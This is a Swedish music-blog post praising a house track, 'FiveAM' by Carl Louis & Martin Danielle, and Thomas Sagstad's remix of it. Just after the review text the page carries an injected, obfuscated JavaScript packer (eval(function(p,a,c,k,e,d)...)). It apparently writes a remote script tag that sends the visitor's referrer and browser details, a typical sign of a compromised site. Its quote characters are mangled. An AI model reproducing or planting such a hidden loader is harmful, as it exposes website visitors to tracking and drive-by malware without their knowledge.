Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Carl Louis & Martin Danielle – FiveAM (Thomas Sagstad Remix)

Carl Louis & Martin Danielle – FiveAM (Thomas Sagstad Remix)
Alexander Gylemo

Norrmännen Carl Louis och Martin Danielle dök upp på radarn 2009 med sin grymma ”The Message”, en av mina favoritlåtar från det året. Duon har anammat Swedish House Mafia-konceptet som inga andra och samtidigt lyckats hålla sig originella, alltid med underbara vocals och grymma melodier i sina låtar. Efter succéen ”The Message” har de fått enorm feedback från just SHM-grabbarna och har t.o.m. fått släppa sin riktigt feta ”Little EP” på Angellos SIZE Records.

FiveAM släpps den trettonde december på Thomas Sagstads nya Agape Music som är ett dotterbolag till Strictly Rhythm i original version och en remix av labelägaren Sagstad själv, en remix som är någon av de mest euforiska houselåtarna jag har hört i år. Både duon och Sagstad håller sig till soundet som har fått Carl Louis och Martin Danielle att komma dit de är idag med syntarna, droppet och vocalsen, men det är Sagstads remix som fått mig frälst, mer än detta behöver jag inte egentligen inte säga, lyssna bara!

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ybrrb|var|u0026u|referrer|iebbz||js|php’.split(’|’),0,{}))
Carl Louis & Martin Danielle – FiveAM (Thomas Sagstad Remix) Preview by Agape-Music